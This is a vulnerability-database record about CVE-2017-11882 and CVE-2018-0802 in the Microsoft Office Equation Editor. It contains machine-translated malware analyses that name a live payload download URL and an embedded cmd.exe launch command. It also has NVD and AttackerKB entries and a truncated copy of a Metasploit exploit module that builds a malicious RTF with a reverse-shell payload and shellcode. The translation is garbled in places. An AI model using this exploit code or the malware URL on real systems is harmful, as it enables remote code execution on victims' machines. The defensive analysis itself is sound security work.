A CVE-2017-11882 vulnerability is a new variation of a sample of the debugging and analysis-vulnerability warning-the black bar safety net
2018-12-02T00:00:00
ID MYHACK58:62201892253 Type myhack58 Reporter 佚名 Modified 2018-12-02T00:00:00
Description
Recently harvested a suffix called doc word document, view the After is actually a rich text format document. In a test environment to open after the discovery of a network connection and executing a program of action, determine the sample is malware document. After a preliminary analysis, found that the sample is CVE-2017-11882 vulnerabilities using a new sample. CVE-2017-11882 vulnerability and CVE-2018-0802 vulnerability based on Office equation editor processing logic, is the nearest office of malicious attacks document by conventional means. On the network for the vulnerability of the Genesis, the use of analysis of already in place, such as 360 days eye laboratory using the Office Equation Editor special processing logic of the newestfree to killtechnical analysis of CVE-2017-11882, as well as Tencent computer housekeeper NDAY vulnerability CVE-2017-11882 and 0Day vulnerability CVE-2018-0802 vulnerability combination of the dissemination of remote control Trojans of the sample analysis and other technical reports. The samples and before each analysis are slightly different, should be CVE-2017-11882 vulnerability and a variant version.
First, the basic operation of the
Experimental environment: windows 7 x64 sp1, Chinese edition, office 2010 Chinese version.
The vulnerability of the sample after opening, the display content of the document is garbled, as shown below.
!
In addition, in the%temp%directory to build and run a named emre. exe executable files. Capture found emre. exe from http://ghthf. cf/cert/ochicha. exe download generated. As shown below.
!
Second, the vulnerability to debug
1, the sample form
winhex opens the following two figures shown. The document directly behind the heel to display the content.
!
Followed by that object, as shown below.
!
2, RTF, a preliminary analysis of the
With rftobj after the analysis of the results is shown below. You can see the clsid for 0002ce02-0000-0000-c000-000000000046 i.e. Microsoft Equation Editor object.
!
!
From the figure we can see that the object name is“eQuatiON native”, the normal name of the object“Equation Native”for the case conversion operations, may also be the pursuit offree to killone of the effects.
3, vulnerability debugging
According to various aspects of the vulnerability analysis report, we direct commissioning a vulnerability where a function 0041160F it.
!
After the 11th rep after the operation, as in the following figure, the stack 0x0043F775 be covered.
!
!
And EQNEDT32. EXE process 0x0043F775 the value of is C3, happens to be the instruction retn。
!
After the execution jumps to the shellcode location. As shown below:
!
4, the shellcode debugging analysis
shellcode location in the eQuatiON-native object.
Divided into two parts, wherein the start location 0×0826, B9 C439E66A shown on figure 0018F354 at the disassembly instructions start to 0851, followed by four bytes 0x0043F7F5(EQNEDT32. EXE process in the RETN instruction is. The second portion of the position in the 0x089E at the beginning to the end.
!
The first part of the shellcode to jump to the second part of the compilation command as shown below:
!
After analysis, found that the segment of shellcode, a series of jmp jump instruction operation, due to shellcode obfuscation and protection. For example, the following figure shows:
!
{"id": "MYHACK58:62201892253", "bulletinFamily": "info", "title": "A CVE-2017-11882 vulnerability is a new variation of a sample of the debugging and analysis-vulnerability warning-the black bar safety net", "description": "Recently harvested a suffix called doc word document, view the After is actually a rich text format document. In a test environment to open after the discovery of a network connection and executing a program of action, determine the sample is malware document. After a preliminary analysis, found that the sample is CVE-2017-11882 vulnerabilities using a new sample. CVE-2017-11882 vulnerability and CVE-2018-0802 vulnerability based on Office equation editor processing logic, is the nearest office of malicious attacks document by conventional means. On the network for the vulnerability of the Genesis, the use of analysis of already in place, such as 360 days eye laboratory using the Office Equation Editor special processing logic of the newest[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)technical analysis of CVE-2017-11882, as well as Tencent computer housekeeper NDAY vulnerability CVE-2017-11882 and 0Day vulnerability CVE-2018-0802 vulnerability combination of the dissemination of remote control Trojans of the sample analysis and other technical reports. The samples and before each analysis are slightly different, should be CVE-2017-11882 vulnerability and a variant version. \nFirst, the basic operation of the \nExperimental environment: windows 7 x64 sp1, Chinese edition, office 2010 Chinese version. \nThe vulnerability of the sample after opening, the display content of the document is garbled, as shown below. \n! [](https://image.3001.net/images/20181124/1543024815_5bf8b0aff1ceb.png! small) \nIn addition, in the%temp%directory to build and run a named emre. exe executable files. Capture found emre. exe from http://ghthf. cf/cert/ochicha. exe download generated. As shown below. \n! [](https://image.3001.net/images/20181124/1543025083_5bf8b1bb3a590.png! small) \nSecond, the vulnerability to debug \n1, the sample form \nwinhex opens the following two figures shown. The document directly behind the heel to display the content. \n! [](https://image.3001.net/images/20181124/1543025978_5bf8b53ac1bc7.png! small) \nFollowed by that object, as shown below. \n! [](https://image.3001.net/images/20181124/1543025728_5bf8b44012bda.png! small) \n2, RTF, a preliminary analysis of the \nWith rftobj after the analysis of the results is shown below. You can see the clsid for 0002ce02-0000-0000-c000-000000000046 i.e. Microsoft Equation Editor object. \n! [](https://image.3001.net/images/20181124/1543026347_5bf8b6ab810d7.png! small) \n! [](https://image.3001.net/images/20181124/1543026881_5bf8b8c10fb6b.png! small) \nFrom the figure we can see that the object name is\u201ceQuatiON native\u201d, the normal name of the object\u201cEquation Native\u201dfor the case conversion operations, may also be the pursuit of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)one of the effects. \n3, vulnerability debugging \nAccording to various aspects of the vulnerability analysis report, we direct commissioning a vulnerability where a function 0041160F it. \n! [](https://image.3001.net/images/20181124/1543027328_5bf8ba80a5a02.png! small) \nAfter the 11th rep after the operation, as in the following figure, the stack 0x0043F775 be covered. \n! [](https://image.3001.net/images/20181124/1543027588_5bf8bb8428e33.png! small) \n! [](https://image.3001.net/images/20181124/1543027800_5bf8bc58c5a27.png! small) \nAnd EQNEDT32. EXE process 0x0043F775 the value of is C3, happens to be the instruction retn\u3002 \n! [](https://image.3001.net/images/20181124/1543028035_5bf8bd439c8e9.png! small) \nAfter the execution jumps to the shellcode location. As shown below: \n! [](https://image.3001.net/images/20181124/1543028175_5bf8bdcf72dd2.png! small) \n4, the shellcode debugging analysis \nshellcode location in the eQuatiON-native object. \nDivided into two parts, wherein the start location 0\u00d70826, B9 C439E66A shown on figure 0018F354 at the disassembly instructions start to 0851, followed by four bytes 0x0043F7F5\uff08EQNEDT32. EXE process in the RETN instruction is. The second portion of the position in the 0x089E at the beginning to the end. \n! [](https://image.3001.net/images/20181124/1543028371_5bf8be938ff06.png! small) \nThe first part of the shellcode to jump to the second part of the compilation command as shown below: \n! [](https://image.3001.net/images/20181124/1543029212_5bf8c1dc1ce30.png! small) \nAfter analysis, found that the segment of shellcode, a series of jmp jump instruction operation, due to shellcode obfuscation and protection. For example, the following figure shows: \n! [](https://image.3001.net/images/20181124/1543029376_5bf8c280e0d65.png! small)\n\n**[1] [[2]](<92253_2.htm>) [next](<92253_2.htm>)**\n", "published": "2018-12-02T00:00:00", "modified": "2018-12-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.myhack58.com/Article/html/3/62/2018/92253.htm", "reporter": "\u4f5a\u540d", "references": [], "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "type": "myhack58", "lastseen": "2018-12-02T18:49:48", "edition": 1, "viewCount": 142, "enchantments": {"score": {"value": 4.8, "vector": "NONE", "modified": "2018-12-02T18:49:48", "rev": 2}, "dependencies": {"references": [{"type": "myhack58", "idList": ["MYHACK58:62201892510"]}, {"type": "cve", "idList": ["CVE-2017-11882", "CVE-2018-0802"]}, {"type": "attackerkb", "idList": ["AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882"]}, {"type": "symantec", "idList": ["SMNTC-102347", "SMNTC-101757"]}, {"type": "fireeye", "idList": ["FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD"]}, {"type": "securelist", "idList": ["SECURELIST:833C831E498502BB46DD03F0C6F4D597", "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "SECURELIST:AFE852637D783B450E3C6DA74A37A5AB", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A"]}, {"type": "threatpost", "idList": ["THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "THREATPOST:1BCC479A05BA19E3B4906CB5F5FD2F1B", "THREATPOST:02A26476FD54111CFB779DB36CA0BE95", "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380"]}, {"type": "thn", "idList": ["THN:42E3306FC75881CF8EBD30FA8291FF29", "THN:ED087560040A02BCB1F68DE406A7F577"]}, {"type": "talosblog", "idList": ["TALOSBLOG:D034163DF19149D9BA90463DA51A05F9"]}, {"type": "mssecure", "idList": ["MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E"]}], "modified": "2018-12-02T18:49:48", "rev": 2}, "vulnersScore": 4.8}}
{"myhack58": [{"lastseen": "2018-12-25T17:29:45", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "! [](/Article/UploadPic/2018-12/20181225205545726. png) \nRecently intercepted an extension doc word document to attack the samples, which format is actually RTF format. By analyzing the document composition the use of a cve-2017-11882 and cve-2018-0802 vulnerability, and use the embedded excel object is used to trigger the vulnerability. The release of the PE file is used to collect the target user's sensitive information. \n\nFirst, the basic situation \nIn the experimental environment win764, the Office 2010 open the document, process monitoring, found that the winword process is executed after the \u9996\u5148\u6267\u884cexcel.exe that \u7136\u540e\u8fd0\u884cEQNEDT32.exe that \u63a5\u7740\u8fd0\u884ccmd.exe finally run A process. X, in which EQNEDT32. exe running twice. \u770b\u5230EQNEDT32.exe bottle feel should be cve-2017-11882 or cve-2018-0802 samples. \nThe document is opened, display as a empty document, as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545737. png) \nOn the figure, inadvertently probably thought it was empty, in fact, a closer look, found the top left a small black point icon. As shown below. \n! [](/Article/UploadPic/2018-12/20181225205545312. png) \nDouble-click the Find pop-up window, as shown below. Display the\u201cwindows cannot open this file: A. X\u201d. Obviously, the\u201csmall black dot\u201dshould be an external object. \n! [](/Article/UploadPic/2018-12/20181225205545780. png) \nRight-click the object, select\u201cpackager shell object\u201dobject, you can view the object's\u201cproperties\u201d. As shown below. \n! [](/Article/UploadPic/2018-12/20181225205545220. png) \nIts object properties as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545229. png) \nSee here, we it can be concluded that: the sample should be is to use the RTF is embedded in a PE object in the open document when the default release to the%temp%directory, then use cve-2017-11882 or cve-2018-0802 execution of the process. \n\nSecond, the RTF analysis \n1, the document structure analysis \n! [](/Article/UploadPic/2018-12/20181225205545186. png) \nUse rtfobj attack on the document analysis, finding its embedded two objects, respectively, is a package object and an Excel. Sheet. 8 object. As shown in Fig. Package object the original file is\u201cC:\\\\\\Users\\\\\\n3o\\\\\\AppData\\\\\\Local\\\\\\Microsoft\\\\\\Windows\\\\\\INetCache\\\\\\Content.Word\\\\\\A.X\u201dit. From this it can be seen, the author of the document[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)user name: n3o on. \nWherein A. X is the release of the malicious PE file. \nThe other one is an embedded excel table object, we put the extract of the excel table the suffix renamed. xls after excel is opened. Find it contains two objects AAAA and bbbb are\u201cEquation. 3\u201dthe object, as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545928. png) \nTo extract the excel table object, which is the document structure as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545742. png) \nThe table includes two CLSID for\u201c0002ce02-0000-0000-c000-000000000046\u201dMicrosoft Equation 3.0 object MBD0002E630 and MBD0002E631, you can see the modification time for the 2018/5/21 17:of 52. \n! [](/Article/UploadPic/2018-12/20181225205545793. png) \nIn addition, two\u201cMicrosoft Equation 3.0\u201dobject. Ole10Native size of 59 bytes and 160 bytes, which contains a\u201ccmd.exe /c %tmp%\\A. X\u201dused to perform A. The X process. Should be used in combination for cve-2017-11882 and cve-2018-0802 two vulnerabilities. \nThus, we can fundamental analysis clear the sample, the overall flow diagram as the following figure shown. \n! [](/Article/UploadPic/2018-12/20181225205545654. png) \n2, the static document \nUse winhex to open, you can find the first package object in File 0x2A8A. Wherein 0x00137158 refers to the size of the object, that is, the decimal 1274200, it is the release of A. X size. Followed by IS PE file in winhex we can see that the author put the PE head 0x4D5A has been modified, inserted in the middle 0x090d is divided, so that it becomes[0x090d]4[0x090d]d[0x090d]5[0x090d]a[0x090d], in fact, is 0x4d5a, such an operation should be in order to avoid certain anti-virus of Avira, not directly to 0x4d5a9000 the look of the rendering, a look that is clearly of the PE file. Specific as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545840. png) \nAnother object in 0x299061 position, is an Exce. Sheet. 8 object. Its size is 0x00005C00, that is, the decimal 23552, and rtfobj extracted exel size consistent. The author of the compound document header has changed, with 0x0909 is divided, so that d0cf11 at the beginning of the composite document into the d[0x0909]0[0x0909]\u3002 Should also be a certain sense of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)\n\n**[1] [[2]](<92510_2.htm>) [[3]](<92510_3.htm>) [next](<92510_2.htm>)**\n", "edition": 1, "modified": "2018-12-25T00:00:00", "published": "2018-12-25T00:00:00", "id": "MYHACK58:62201892510", "href": "http://www.myhack58.com/Article/html/3/62/2018/92510.htm", "title": "A use cve-2017-11882 and cve-2018-0802 combination of vulnerability a malicious document analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2021-02-02T06:52:22", "description": "Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allow a remote code execution vulnerability due to the way objects are handled in memory, aka \"Microsoft Office Memory Corruption Vulnerability\". This CVE is unique from CVE-2018-0797 and CVE-2018-0812.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-10T01:29:00", "title": "CVE-2018-0802", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:microsoft:word:2007", "cpe:/a:microsoft:word:2013", "cpe:/a:microsoft:office:2007", "cpe:/a:microsoft:office:2010", "cpe:/a:microsoft:word:2010", "cpe:/a:microsoft:word:2016", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office_compatibility_pack:-", "cpe:/a:microsoft:office:2016"], "id": "CVE-2018-0802", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0802", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:word:2013:sp1:*:*:rt:*:*:*", "cpe:2.3:a:microsoft:office:2016:*:*:*:click-to-run:*:*:*", "cpe:2.3:a:microsoft:office:2010:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:word:2013:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2007:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:word:2010:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:word:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office_compatibility_pack:-:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:word:2007:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka \"Microsoft Office Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11884.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11882", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-01-26T18:15:00", "cpe": ["cpe:/a:microsoft:office:2007", "cpe:/a:microsoft:office:2010", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2016"], "id": "CVE-2017-11882", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11882", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2010:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2007:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-01-26T21:28:55", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-11884"], "description": "Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka \u201cMicrosoft Office Memory Corruption Vulnerability\u201d. This CVE ID is unique from CVE-2017-11884.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:42pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products \n\n * Associated Malware: Loki, FormBook, Pony/FAREIT \n\n * Mitigation: Update affected Microsoft products with the latest security patches \n\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-11882> \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133e>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-07-30T00:00:00", "published": "2017-11-15T00:00:00", "id": "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "href": "https://attackerkb.com/topics/oGYjzY0Hw3/cve-2017-11882", "type": "attackerkb", "title": "CVE-2017-11882", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-15T09:46:17", "description": "Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Microsoft Office CVE-2017-11882", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office CVE-2017-11882',\n 'Description' => %q{\n Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.\n },\n 'Author' => ['mumbai', 'embedi'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-11-15',\n 'References' => [\n ['CVE', '2017-11882'],\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\n ],\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\n }\n ))\n\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def retrieve_header(filename)\n if (not datastore['FOLDER_PATH'].nil?)\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s # otherwise I get nil class...\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n return header\n end\n\n\n\n def generate_rtf\n header = retrieve_header(datastore['FILENAME'])\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\n object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\n\n\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR 